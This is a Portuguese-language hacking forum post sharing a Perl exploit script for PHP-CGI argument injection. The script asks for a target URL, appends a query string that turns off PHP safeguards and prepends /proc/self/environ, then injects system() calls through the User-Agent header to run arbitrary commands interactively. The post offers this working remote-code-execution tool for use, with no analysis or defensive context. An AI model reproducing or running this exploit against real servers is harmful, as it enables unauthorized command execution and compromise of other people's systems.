seja bem vindo ao forum eof, caso nao seja cadastrado se cadastre para poder visualizar todo o conteudo ^^

Participe do fórum, é rápido e fácil

seja bem vindo ao forum eof, caso nao seja cadastrado se cadastre para poder visualizar todo o conteudo ^^
Gostaria de reagir a esta mensagem? Crie uma conta em poucos cliques ou inicie sessão para continuar.

Você não está conectado. Conecte-se ou registre-se

PHP-CGI Argument injection - RCE EXPLOIT -

Ir para baixo  Mensagem [Página 1 de 1]

mmxm

avatar
avançado
avançado

Código:
#!/usr/bin/perl

require LWP::UserAgent;
my $useragent = LWP::UserAgent->new;
$x = "?-n+-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3d/proc/self/environ";

print q {
[+] PHP-CGI Argument Injection  - RCE Exploit -
[-] By MMxM

Digite a url , exe: www.abc.com

[+] };
chomp($url = <STDIN>);
if ( $url !~ /^http:/ ) {
$url = 'http://' . $url;
}
if ( $url !~ /\/$/ ) {
$url = $url . '/';
}
$target = "$url$x";
print q "
[*] Sh3ll

$ ";
chomp( $shell = <STDIN> );
while($shell !~ "exit") {
$inject="mmxm<?system(\"$shell 2> /dev/stdout\"); ?>mmxm\');?>";
$useragent->agent("$inject");
my $response = $useragent->get($target);
if ($response->content=~ /mmxm(.*)mmxm/s){print $1;}
print q "$ ";
chomp( $shell = <STDIN> );
}

Ir para o topo  Mensagem [Página 1 de 1]

Permissões neste sub-fórum
Não podes responder a tópicos